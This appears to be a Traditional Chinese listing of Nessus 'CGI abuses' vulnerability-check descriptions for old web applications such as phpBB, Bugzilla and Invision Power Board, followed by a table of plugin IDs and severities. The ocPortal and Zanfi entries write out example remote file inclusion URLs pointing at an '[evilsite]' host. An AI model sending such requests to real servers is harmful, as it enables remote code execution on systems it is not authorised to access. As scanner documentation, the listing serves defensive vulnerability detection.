遠端主機正在執行 phpBB。此遠端軟體中有一個瑕疵，可允許任何人在登入表單中注入任意 SQL 命令。攻擊者可利用此瑕疵，來繞過遠端主機的驗證，或對遠端資料庫執行任意 SQL 陳述式。

ESMARKCONANT 是由稱為影子經紀人 (Shadow Broker) 的組織，於 2017 年 4 月 14 日所披露的眾多方程式組織 (Equation Group) 弱點和攻擊程式中的一個。

遠端主機正在執行 phpBB，這是一個以 PHP 編寫的佈告欄系統。

遠端主機上的 Invision Power Board 版本受到「sources/post.php」中一個瑕疵影響，其允許攻擊者向遠端 SQL 資料庫注入 SQL 命令。攻擊者可利用此瑕疵取得遠端資料庫的控制權，並可能覆寫遠端主機上的檔案。

遠端主機上安裝的 Invision Power Board 包含一個名為「Arcade」的選用模組，其允許未經授權的使用者透過「cat」參數向遠端 SQL 資料庫注入 SQL 命令。攻擊者可利用此瑕疵取得遠端資料庫的控制權，並可能覆寫遠端主機上的檔案。

根據標題來判斷，遠端主機上的 phpScheduleIt 版本低於 1.0.1。據報告，這些版本容易受到一個不明問題影響，其可允許攻擊者修改或刪除預訂。

遠端主機正在使用 miniBB 論壇管理系統。

根據版本號碼來判斷，此論壇容易遭受 SQL 注入攻擊。應用程式未正確清理 index.php 的「user」參數中的輸入。遠端攻擊者可利用此弱點，來對遠端資料庫執行任意 SQL 查詢。

使用已安裝的 phpBB CGI 套件，有可能讓遠端主機包含在第三方伺服器上主控的 PHP 檔案。 

攻擊者可利用此瑕疵，在遠端主機中插入任意程式碼，並以 Web 伺服器的權限取得 Shell。

遠端主機正在使用 PowerPortal，這是一個以 PHP 編寫的內容管理系統。 

此產品的遠端版本中有一個弱點，可允許遠端攻擊者對遠端主機執行 SQL 注入攻擊。

攻擊者可利用此瑕疵，針對遠端資料庫執行任意 SQL 陳述式，並可能在遠端主機上執行任意命令。

已安裝指令碼 i-mall.cgi。此指令碼的某些版本容易受到遠端命令執行瑕疵影響，這是 i-mall.cgi 指令碼的「p」參數的使用者輸入清理不充分所致。
惡意使用者可透過此指令碼在遠端伺服器上傳遞任意 shell 命令。

遠端主機正在執行 CVSTrac，這是一個適用於 CVS 的 Web 型錯誤和修補程式集追蹤系統。

遠端主機正在執行 PostNuke，這是一個以 PHP 編寫的內容管理系統。

Postnuke 的開發已於 2008 年停止。不會修補安全性瑕疵。

遠端主機正在執行 eGroupWare，這是一種 Web 型群組軟體解決方案。

遠端主機正在執行 eGroupWare，這是一種 Web 型群組軟體解決方案。 

據報告， 1.0.0.006 版及更舊版本容易受到多個 SQL 注入和跨網站指令碼瑕疵影響。

遠端主機正在執行 SquirrelMail，這是一個以 PHP 編寫的 Web 郵件系統。

1.4.4 之前的 SquirrelMail 版本受到電子郵件 HTML 注入問題影響。遠端攻擊者可利用此瑕疵來取得使用者帳戶的存取權。

根據自我報告的版本號碼來判斷，遠端主機上正在執行的 Goollery 執行個體受到 viewpic.php 指令碼中多個跨網站指令碼 (XSS) 弱點影響。未經驗證的遠端攻擊者可惡意利用這些弱點，透過特製要求在使用者的瀏覽器工作階段內執行任意指令碼。

遠端 Web 伺服器上主控的 PhpGroupWare 版本有一個弱點，可允許遠端攻擊者透過「phpgw.inc.php」指令碼的「phpgw_info」參數執行任意命令，進而導致缺乏完整性。

已安裝「cgi.rb」CGI。有些版本容易遭受拒絕服務攻擊。

惡意使用者可藉由傳送特製的 HTTP POST 要求，強制遠端主機消耗大量 CPU 資源。

*** 警告：Nessus 僅相信存在此 *** CGI，並不能確定您的特定版本是否 *** 容易受到該問題影響。

遠端主機正在執行 PHP/FI。

此軟體的遠端版本在 mylog.html/mlog.html 檔案中有一個瑕疵，可允許遠端攻擊者檢視遠端主機上的任意檔案。

根據標題來判斷，遠端的 Mantis 版本受到數個資訊洩漏弱點的影響，可允許攻擊者檢視所有專案的統計資料，或在移除惡意使用者後接收專案的資訊。

遠端主機正在執行 IceWarp Web Mail，這是一個適用於 Microsoft Windows 平台的 Web 郵件解決方案。

此軟體的遠端版本容易受到多個輸入驗證問題影響，可允許攻擊者危害遠端主機的完整性。

遠端主機上正在執行的 Moodle 套件為 1.4.3 版之前版本。因此，會受到「glossary」模組中一個 SQL 插入弱點影響，這是因為缺少使用者輸入清理所致。

此外，據報告，Moodle 也受到目錄遊走和跨網站指令碼瑕疵影響。不過，Nessus 並未明確測試這些問題。

遠端 Web 伺服器中的 Gallery 版本可允許攻擊者透過不明向量注入任意 HTML 標籤。

遠端 Web 伺服器正在執行 Horde，這是 Horde Project 提供的一個 PHP 型應用程式架構。

根據版本號碼來判斷，遠端 Bugzilla Bug 追蹤系統容易受到任意命令執行瑕疵影響，這是應用程式未清理 process_bug.cgi 中使用者提供的資料所致。

遠端 Web 伺服器安裝有 _maincfgret CGI。某些版本容易受到緩衝區溢位弱點影響。請注意，Nessus 僅檢查是否存在此 CGI，並未嘗試判斷其是否有弱點。

根據版本號碼來判斷，遠端 Bugzilla Bug 追蹤系統容易受到多種瑕疵影響，攻擊者可利用這些瑕疵來繞過驗證或取得私人錯誤報告的存取權。

遠端 UBB.threads 版本中存在 SQL 注入問題，攻擊者可藉由傳送格式錯誤的值到「dosearch.php」檔案的「Name」引數，在遠端主機上執行任意 SQL 陳述式，並可能覆寫遠端系統中的任意檔案。

遠端主機正在執行 WowBB，這是一個以 PHP 編寫的 Web 論壇。 

根據版本來判斷，遠端安裝的 WowBB 為 1.61 版或更舊版本。這些版本容易遭受跨網站指令碼和 SQL 注入攻擊。惡意使用者可竊取使用者的 Cookie (包括驗證 Cookie)，並操控 SQL 查詢。

遠端主機正在執行 DevoyBB，這是一個以 PHP 編寫的 Web 論壇。 

安裝的版本容易受到 XSS 和 SQL 注入攻擊。惡意使用者可存取使用者的 Cookie (包括驗證 Cookie)，並注入要在基礎資料庫上執行的 SQL 命令。

遠端的 Serendipity 版本存在 HTTP 回應分割弱點，可允許攻擊者對遠端主機執行跨網站指令碼攻擊。

遠端主機上已安裝 nbmember.cgi。

此軟體的遠端版本容易受到資訊洩漏瑕疵影響，可允許攻擊者存取敏感的系統資訊，進而導致機密性喪失。

遠端主機正在執行 IdealBB，這是一個以 ASP 編寫的 Web 型佈告欄系統。

此軟體的遠端版本有多個瑕疵，包括 SQL 注入、跨網站指令碼和 HTTP 回應分割弱點。

遠端主機正在執行「Coppermine Gallery」，這是一組用來處理圖片集的 PHP 指令碼。

此產品有一個弱點，允許已停用 Cookie 的遠端攻擊者為某張圖片多次投票。

此外掛程式會判斷遠端 Web 伺服器上是否安裝了「Coppermine Photo Gallery」，並擷取所找到的任何執行個體的版本號碼和位置。

Coppermine 是一個以 PHP 編寫的開放原始碼 Web 型圖庫應用程式。

目標主機正在執行至少一個 Open WebMail 執行個體，其中的 userstat.pl 元件無法充分驗證使用者輸入。遠端攻擊者可利用此問題，使用 Web 伺服器運作權限在目標主機上執行任意程式。如需詳細資訊，請參閱：

  http://www.openwebmail.org/openwebmail/download/cert/advisories/SA-04:01.txt

遠端主機正在執行 CoolPHP 內容管理系統。

此軟體的遠端版本有多種瑕疵，可允許攻擊者讀取遠端主機上的任意檔案，或設定跨網站指令碼攻擊。

根據標題來判斷，遠端 phpMyAdmin 版本介於 2.5.0 和 2.6.0-pl1 之間。由於處理外部 MIME 型轉換的方式，這些版本可允許經驗證的遠端攻擊者執行需要 Web 伺服器權限的任意命令。 

請注意，若要成功攻擊，需要停用 PHP 的「safe_mode」，而且系統管理員不僅要準備特殊表格用於保留某些資訊，還要在組態中指定。

遠端主機似乎正在執行 BugPort，這是一個開放原始碼 Web 型系統，用於管理整個軟體開發過程中的工作和瑕疵。

此版本的 BugPort 有一個不明的附件處理瑕疵。

遠端主機正在執行 ocPortal，這是一個以 PHP 編寫的內容管理系統。

此軟體的遠端版本有一個錯誤，可允許攻擊者利用檔案「index.php」中的檔案包含錯誤，在遠端主機上執行任意命令。

攻擊者可透過以下要求執行任意命令：

  http://www.example.com/index.php?req_path=http://[evilsite]/

這會讓遠端指令碼在遠端網站上包含「funcs.php」檔案並執行。

遠端伺服器執行的 bBlog 是 0.7.4 版或更低版本，這是一個以 PHP 編寫並在 GPL 下發佈的部落格系統。 

此軟體的遠端版本受到指令碼「rss.php」中一個 SQL 注入攻擊弱點影響。造成此問題的原因在於，應用程式未正確清理使用者提供的輸入。 

攻擊者可利用此瑕疵在主機上執行任意 PHP 程式碼，或控制遠端資料庫。

遠端主機在執行 CactuShop，這是一個以 ASP 編寫的電子商務 Web 應用程式。

此軟體的遠端版本容易受到跨網站指令碼弱點影響，這是應用程式未清理「popuplargeimage.asp」指令碼中使用者提供的資料所致。

若成功攻擊此問題，攻擊者可以在有弱點的伺服器上執行惡意指令碼。 

此版本也可能容易受到指令碼「mailorder.asp」和「payonline.asp」中的 SQL 注入攻擊弱點影響。應用程式未篩選「strItems」參數的使用者輸入資料便將其用於 SQL 查詢。因此，攻擊者可透過格式錯誤的輸入來修改查詢。

攻擊者若成功利用此弱點，可在系統中執行命令 (透過 MS SQL 的 xp_cmdshell 函式)。

遠端主機正在執行 DUware 發佈的產品 - DUclassmate、DUclassified 或 DUforum。

此軟體的遠端版本有一個瑕疵，可允許攻擊者向 /admin/、messages.asp 或 messagesDetails.asp 的引數提供格式錯誤的值，進而在遠端主機上執行任意 SQL 陳述式。

此外，DUclassified 在訊息文字處理中存在跨網站指令碼弱點。DUclassmate 的 account.asp 中存在未經授權的密碼操控問題。

遠端主機正在執行 Zanfi CMS Lite，這是一個以 PHP 編寫的內容管理系統。 

此軟體的遠端版本有一個錯誤，可允許攻擊者利用檔案「index.php」中的檔案包含錯誤，在遠端主機上執行任意命令。 

攻擊者可透過以下要求執行任意命令：

  http://www.example.com/index.php?inc=http://[evilsite]/commands

這會讓遠端指令碼包含「commands.php」檔案並執行。

遠端主機正在執行 GoSmart 留言板，這是一個以 ASP 編寫的佈告欄管理員。

此軟體的遠端版本有多個瑕疵，這是應用程式未正確清理使用者提供的輸入所造成。

此外也受到跨網站指令碼弱點影響。因為此弱點，遠端攻擊者可能會建立含有指令碼的惡意連結，而該指令碼將在造訪時於不知情使用者的瀏覽器中執行。

此外，此版本也容易受到 SQL 注入攻擊瑕疵影響，允許攻擊者注入任意 SQL 命令。

遠端主機正在執行 BlackBoard Internet Newsboard System，這是一個開放原始碼 PHP 型網際網路佈告欄軟體應用程式。

此軟體的遠端版本容易受到 checkdb.inc.php 中的遠端檔案引入瑕疵影響，這是應用程式未清理「libpath」參數的使用者輸入資料所致。

若成功攻擊此問題，攻擊者可以在有弱點的伺服器上執行惡意指令碼。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。因此，
 ***這可能為誤報。

根據標題來判斷，遠端 WordPress 版本容易遭受 HTTP 分割攻擊，攻擊者可插入 CR LF 字元，然後引誘不知情的使用者存取 URL。用戶端會剖析攻擊者提供的次要標頭，並可能對其採取行動。

遠端 CubeCart 版本中存在 SQL 注入問題，攻擊者可藉由傳送格式錯誤的值到「index.php」檔案的「cat_id」引數，在遠端主機上執行任意 SQL 陳述式，並可能覆寫遠端系統中的任意檔案。

遠端主機正在執行 w-agora，這是一個以 PHP 編寫的 Web 型論壇應用程式。

此軟體的遠端版本容易遭受目錄遊走攻擊。遠端攻擊者可傳送特製的 URL，以 Web 伺服器處理程序的權限從遠端系統讀取任意檔案。

遠端主機執行的 PHP 版本比 5.0.2 或 4.39 舊。

此軟體的遠端版本受到 PHP_Variables 中記憶體洩漏弱點的影響。攻擊者可能惡意利用此瑕疵，從遠端讀取遠端主機上 httpd 處理程序的部分記憶體。

ID	名稱	嚴重性
15780	phpBB viewtopic.php highlight 參數 SQL 注入攻擊 (ESMARKCONANT)	critical
15779	phpBB 偵測	info
15778	Invision Power Board sources/post.php qpid 參數 SQL 注入	high
15775	Invision Power Board ibProArcade 模組 index.php cat 參數 SQL 注入	high
15772	phpScheduleIt < 1.0.1 Reservation.class.php 任意預訂修改	medium
15763	miniBB index.php user 參數 SQL 注入攻擊	high
15762	phpBB Cash_Mod admin_cash.php 任意命令執行	high
15760	PowerPortal index.php index_page 參數 SQL 注入攻擊	high
15750	Webman I-Mall i-mall.cgi 任意命令執行	critical
15722	CVSTrac 偵測	info
15721	PostNuke 偵測	high
15720	eGroupWare 偵測	info
15719	EGroupWare 多個弱點 (SQLi、ID)	high
15718	SquirrelMail decodeHeader 任意 HTML 注入	medium
15717	Goollery < 0.04b 多個弱點	medium
15711	phpGroupWare phpgw.inc.php phpgw_info 參數遠端檔案引入	critical
15710	Ruby cgi.rb 格式錯誤的 HTTP 要求 CPU 使用率 DoS	medium
15708	PHP < 3.0 mylog.html/mlog.html 任意檔案存取	medium
15651	Mantis < 0.19.1 多個弱點	medium
15643	IceWarp Web Mail 多個瑕疵 (2)	medium
15639	Moodle < 1.4.3 多個弱點	high
15624	Gallery 不明的 HTML 注入弱點	medium
15604	Horde 軟體偵測	info
15565	Bugzilla 多個遠端命令執行	high
15564	Ipswitch WhatsUp Gold _maincfgret.cgi 遠端溢位	high
15562	Bugzilla < 2.16.7 / 2.18.0rc3 多個資訊洩漏弱點	medium
15561	UBB.threads dosearch.php SQL 注入攻擊	high
15557	WowBB <= 1.61 多個弱點	high
15556	DevoyBB 多個遠端弱點 (SQLi、XSS)	high
15543	Serendipity 多個指令碼 HTTP 回應分割	medium
15542	Netbilling nbmember.cgi cmd 參數資訊洩漏	medium
15541	IdealBB 多個弱點 (XSS、SQLi 等)	medium
15531	Coppermine Photo Gallery 投票限制繞過	medium
15530	Coppermine Photo Gallery 偵測	info
15529	Open WebMail userstat.pl 任意命令執行	high
15506	CoolPHP 1.0 多個弱點	medium
15478	phpMyAdmin < 2.6.0-pl2 不明的任意命令執行弱點	medium
15470	BugPort 附加檔案處理不明問題	high
15469	IceWarp Web Mail 多個瑕疵 (1)	high
15468	ocPortal index.php req_path 參數遠端檔案引入	high
15466	bBlog rss.php p 參數 SQL 注入攻擊	high
15461	CactuShop 5.x 多個遠端弱點 (XSS、SQLi)	high
15453	DUware 產品多個遠端弱點 (SQLi、XSS)	high
15452	Zanfi CMS Lite index.php inc 參數遠端檔案引入	high
15451	GoSmart 留言板多個弱點 (SQLi、XSS)	high
15450	BlackBoard Internet Newsboard System checkdb.inc.php libpath 參數遠端檔案引入	high
15443	WordPress「wp-login.php」HTTP 回應分割	medium
15442	CubeCart index.php cat_id 參數 SQL 注入攻擊	high
15437	w-Agora 多個指令碼遊走任意檔案存取	medium
15436	PHP php_variables.c 多個變動不成對括號記憶體洩漏	medium

偵測

Nessus 的 CGI abuses 系列

critical

info

high

high

medium

high

high

high

critical

info

high

info

high

medium

medium

critical

medium

medium

medium

medium

high

medium

info

high

high

medium

high

high

high

medium

medium

medium

medium

info

high

medium

medium

high

high

high

high

high

high

high

high

high

medium

high

medium

medium